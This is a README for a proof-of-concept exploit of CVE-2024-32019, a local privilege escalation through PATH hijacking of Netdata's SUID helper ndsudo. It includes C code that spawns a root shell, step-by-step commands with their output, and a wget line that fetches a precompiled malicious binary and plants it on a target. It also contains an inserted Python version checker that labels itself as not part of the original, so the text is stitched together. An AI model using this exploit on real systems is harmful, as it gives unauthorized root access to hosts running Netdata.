Description
Netdata ndsudo local privilege escalation workflow and POC (CVE-2024-32019)
Introduction
# CVE-2024-32019-POC
Netdata ndsudo local privilege escalation workflow and POC (CVE-2024-32019)
- [Workflow](#workflow)
- [Automatic exploit](#automatic-exploit)
- [Resources](#resources)
## Workflow
> [!TIP]
> Please read
Netdata is a monitoring tool for applications and systems. It listens on port 19999, which makes it easy to find:
```shell
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:19999 0.0.0.0:* LISTEN
```
This vulnerability (CVE-2024-32019) **affects** the following versions: `>= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169`. We can send a request and read the version from the response header:
<img width="605" height="289" alt="CVE-2024-32019-1" src="https://github.com/user-attachments/assets/121b7527-1c0b-4564-abd9-1b663bfe94f8" />
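To triage a host against the version ranges above, the check below (an added example, not code from the original README or from Netdata) parses a version string and compares stable and nightly builds separately. The nightly string shape (`v1.45.0-169-nightly`) and the reading of the list as two half-open ranges are assumptions; the sample strings are constructed.

```python
import re

# Affected ranges as listed on this page, read as two half-open intervals
# (assumption): stable releases and nightly builds are compared separately.
STABLE_RANGE = ((1, 45, 0), (1, 45, 3))            # >= v1.45.0, < v1.45.3
NIGHTLY_RANGE = ((1, 44, 0, 60), (1, 45, 0, 169))  # >= v1.44.0-60, < v1.45.0-169

# Assumed version shape: vMAJOR.MINOR.PATCH for stable releases, with
# "-<commit count>" appended for nightlies (e.g. v1.45.0-169-nightly).
VERSION_RE = re.compile(r"v(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_version(text):
    """Return (major, minor, patch, commits); commits is None for a stable release."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no Netdata version found in {text!r}")
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    commits = int(m.group(4)) if m.group(4) is not None else None
    return major, minor, patch, commits


def is_affected(text):
    """True if the version found in text falls inside the ranges listed on this page."""
    major, minor, patch, commits = parse_version(text)
    if commits is None:  # stable release: compare the three-part version
        lo, hi = STABLE_RANGE
        return lo <= (major, minor, patch) < hi
    lo, hi = NIGHTLY_RANGE  # nightly: the commit count decides within a release
    return lo <= (major, minor, patch, commits) < hi


# Constructed sample version strings (not captured from a real host).
SAMPLES = [
    "v1.44.3", "v1.45.0", "v1.45.2", "v1.45.3",
    "v1.44.0-59-nightly", "v1.44.0-60-nightly",
    "v1.45.0-168-nightly", "v1.45.0-169-nightly", "v1.45.0-200-nightly",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "AFFECTED" if is_affected(sample) else "not in the listed ranges"
        print(f"{sample:22} {verdict}")
```

A single-range comparison would flag `v1.45.0-200-nightly` as affected because it sorts between v1.45.0 and v1.45.3; splitting by release channel avoids that false positive.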
The exploit works by **PATH hijacking** against one of Netdata's plugins, `ndsudo`, which is often located under `/opt/netdata/usr/libexec/netdata/` and has the SUID bit set.
```shell
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```
<img width="1064" height="51" alt="CVE-2024-32019-2" src="https://github.com/user-attachments/assets/3bfa95c7-614c-48a9-b95f-267ebf26475c" />
We can see what it lets us do using `--help`:
```shell
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
--test
print the generated command that will be run, without running it.
--help
print this message.
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : nvme-smart-log
Executables: nvme
Parameters : smart-log {{device}} --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
- Command : megacli-battery-info
Executables: megacli MegaCli
Parameters : -AdpBbuCmd -aAll -NoLog
- Command : arcconf-ld-info
Executables: arcconf
Parameters : GETCONFIG 1 LD
- Command : arcconf-pd-info
Executables: arcconf
Parameters : GETCONFIG 1 PD
The program searches for executables in the system path.
Variables given as {{variable}} are expected on the command line as:
--variable VALUE
VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
```
```shell
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.
```
As we can see, `ndsudo` offers several commands, and each one looks up an executable through the PATH. We can leverage this by creating our own executable, named after one of the expected executables, in a directory that we add to the PATH environment variable.
Netdata uses `C`, so we have to write our program in C and compile it.
<img width="1127" height="1157" alt="CVE-2024-32019" src="https://github.com/user-attachments/assets/5b9ca43a-3bf4-4158-ae04-956acbce4660" />
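```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* Set the real UID and GID to root (works only when already running with euid 0) */
    setuid(0);
    setgid(0);
    /* -p tells bash not to drop privileges when effective and real IDs differ */
    execl("/bin/bash", "bash", "-p", NULL);
    perror("execl"); /* reached only if execl fails */
    return 1;
}
```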
```shell
gcc arcconf.c -o arcconf
```
Then, as previously discussed, we add the executable's directory to `$PATH`:
```shell
test@test:/tmp$ PATH=/tmp:$PATH
```
Finally, we execute the command that points to our malicious executable (`arcconf-pd-info -> arcconf`), and it gives us a privileged shell:
```shell
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root
```
## Automatic exploit
You can download the precompiled malicious C binary, which gives you a bash shell as root as described in the example above:
```shell
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf
```
```shell
mv arcconf /tmp                       # If your target has Internet connectivity
scp ./arcconf test@test:/tmp/arcconf  # If your target does not have Internet connectivity
```
```shell
PATH=/tmp:$PATH
```
```shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info  # The ndsudo path may change
```
## Resources
- https://learn.netdata.cloud/docs/collecting-metrics/
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
- https://app.hackthebox.com/machines/684
File snapshot
[4.0K] /data/pocs/f045e1879a0473dd4c8b3eb4502a450f08259470
├── [ 15K] arcconf
├── [400K] CVE-2024-32019.pdf
└── [4.3K] README.md
0 directories, 3 files